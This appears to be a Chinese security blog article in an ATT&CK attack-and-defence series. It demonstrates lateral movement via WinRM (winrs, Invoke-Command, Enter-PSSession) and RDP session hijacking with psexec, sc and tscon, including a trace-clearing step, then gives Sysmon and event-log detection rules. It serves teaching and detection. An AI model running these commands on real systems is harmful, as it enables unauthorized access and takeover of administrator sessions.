ATT&CK攻防初窥系列–横向移动篇(一)

ATT&CK攻防初窥系列–横向移动篇(一)

之前的文章介绍了ATT&CK执行篇中Control和XSL的用法。在网络攻防中,执行往往发生在进入入口后的初始阶段,而横向移动则发生在中间阶段。横向移动的目的是根据已有条件扩大攻击成果。下面我们将会像大家展示ATT&CK中罗列的横向移动手法的运用和检测。

T1028-Windows Remote Management

在介绍Windows Remote Management(Winrm)之前,首先要介绍WS-Management(Web服务器管理协议)。WS-Management协议是一种基于SOAP协议的DMTF开放标准,用于对服务器等网络设备进行管理。WinRM是windows对于该协议的一种实现。

根据微软官方文档介绍:

1、WinRM服务将在Windows Server 2008上自动启动。在Windows Vista上,该服务必须手动启动。

2、默认情况下,未配置WinRM 侦听器。即使WinRM服务正在运行,也无法接收或发送请求数据的WS-Management协议消息。

3、Internet连接防火墙(ICF)阻止访问端口。

通过administrator权限使用下面命令可以打开上述限制条件,开启winrm服务并监听端口

winrm quickconfig

1.png

winrm e winrm/config/listener  #查看监听情况

2.png

可以看到现在winrm开启了5985进行监听并使用HTTP协议进行传输,而ListeningOn字段则是监听的ip地址(都是自身ip地址)。

配置好服务端之后如果我们尝试通过客户端连接服务端进行远程代码执行的时候会出现如下报错

3.png

原因是winrm客户端维护这一个信任主机列表只有在信任主机列表中的服务端才允许连接。

winrm set winrm/config/client @{TrustedHosts=”*”}

测试远程服务器是否开启winrm

Test-WsMan 10.50.1.208                            #在powershell中执行

4.png

技术复现

横向移动(winrs)

winrs -r:http://10.50.1.208:5985 -u:administrator -p:xxxxxxxx ipconfig

5.png

横向移动(Invoke-Command)

Invoke-Command -ComputerName 10.50.1.208 -ScriptBlock {ipconfig} -credential administrator          #ComputerName后可以跟ip或者计算机名

6.png

验证成功后输出ipconfig命令内容

7.png

横向移动(Enter-PSSession)

Enter-PSSession -ComputerName 10.50.1.208 -Credential administrator

8.png

验证成功后弹回远程主机的powershell

9.png

威胁检测

数据源:文件监视,身份验证日志,网络连接监视,进程监视,进程命令行参数

WINRM流量特征

通过对winrs、Enter-PSSession、Invoke-Command通信流量抓包发现其通信特征相同,都是通过请求http://xxx.xxx.xxx.xxx/wsman 来进行验证和下发命令。并且即使WinRM是使用http通信的但是其通信内容也是加密的,加密的protocal为”application/HTTP-SPNNEG-session-encrypted”

User-Agent contains “Microsoft WinRM Client” AND Content-Type contains “HTTP-SPNNEG-session-encrypted” AND Content-Type contains “Encrypted Boundary”

10.png

WINRM客户端

#winrm客户端产生4656日志
eventNum:4656

11.png

网络特征:(级别:高)

sysmon检测到powershell或者winrs.exe发起的网络连接信息

eventNum:3 AND DestinationPort:5985 AND (Image contains:”powershell.exe” OR Image contains:”winrs.exe”)

12.png

13.png

进程特征:(级别:高)

sysmon检测到到winrm.vbs的进程创建

eventNum:1 AND CommandLine contains winrm.vbs

命令行参数特征:(级别:高)

CommandLine contains “Invoke-Command” OR CommandLine contains “Enter-PSSession” OR Image contains “winrs.exe”

WINRM服务端

进程特征:(级别高)

在使用winrm执行远程命令时,目标机器会启动一个winrshost.exe来执行远程命令。

eventNUm:1 AND ParentImage contains “winrshost.exe”

14.png

T1076 Remote Desktop Protocol

远程桌面是操作系统中的常见功能。它允许用户使用远程系统上的系统桌面图形用户界面登录到交互式会话。Microsoft将其对远程桌面协议(RDP)的实现称为远程桌面服务(RDS)。

如果启用了服务并允许访问具有已知凭据的帐户,则攻击者可以通过RDP / RDS连接到远程系统以扩展访问权限。攻击者可能会使用凭据访问技术来获取与RDP一起使用的凭据。攻击者还可以结合使用RDP和可访问性功能技术来实现持久性。

攻击者还可能执行RDP会话劫持,其中涉及窃取合法用户的远程会话。通常情况下当其他人试图窃取其会话(可以理解为windows的快速切换用户功能)时会收到问题提示并要求出示密码。凭借系统权限(SYSTEM权限)的终端服务控制台c:windowssystem32tscon.exe [session number to be stolen],攻击者可以切换会话而无需输入密码。这可能导致攻击者窃取域管理员或更高特权的账户会话。

技术复现

前置条件:拥有某个本地管理员组账号的权限

目的:通过rdp会话劫持使我们可以从该管理员组账号切换到本机任意一个账户的rdp会话中

以一台域控制器(10.50.1.208)为例,我们获取了其本地管理员组一个用户(huahua)的凭据。

15.png

16.png

横向移动(PSExec)

psexec.exe -s cmd       #获取SYSTEM权限的shell

17.png

query user          #查看当前存在的会话

tscon 2 /dest:rdp-tcp#0              #2为administrator的会话id,rdp-tcp#0为我们当前会话名

21.png

可以看到我们已经成功切换到了域管理员的会话中。

横向移动(SC)

原理为使用sc命令实现执行SYSTEM权限的命令

query user            #查看当前存在的会话
sc create huahua binPath= “tscon 2 /dest:rdp-tcp#0”
sc start huahua

20.png

21.png

sc delete huahua           #清除痕迹

威胁检测

进程特征

通过tscon.exe实现RDP劫持的前提为执行tscon.exe的用户权限为SYSTEM,可以通过检测新创建的tscon.exe进程的User是否为SYSTEM来判断是否发生了可疑的RDP劫持。

Image contains “tscon.exe” AND USER contains “NT AUTHORITY\SYSTEM”

22.png

当使用rdp会话劫持切换用户时安全日志会出现4778、4779两条安全日志

23.png

24.png

ATT&CK攻防初窥系列--横向移动篇(一)

极牛网精选文章《ATT&CK攻防初窥系列–横向移动篇(一)》文中所述为作者独立观点,不代表极牛网立场。如若转载请注明出处:https://geeknb.com/12971.html

(31)
打赏 微信公众号 微信公众号 微信小程序 微信小程序
主编的头像主编认证作者
上一篇 2020年11月25日 下午6:01
下一篇 2020年11月25日 下午7:02

相关推荐

发表回复

登录后才能评论
扫码关注
扫码关注
分享本页
返回顶部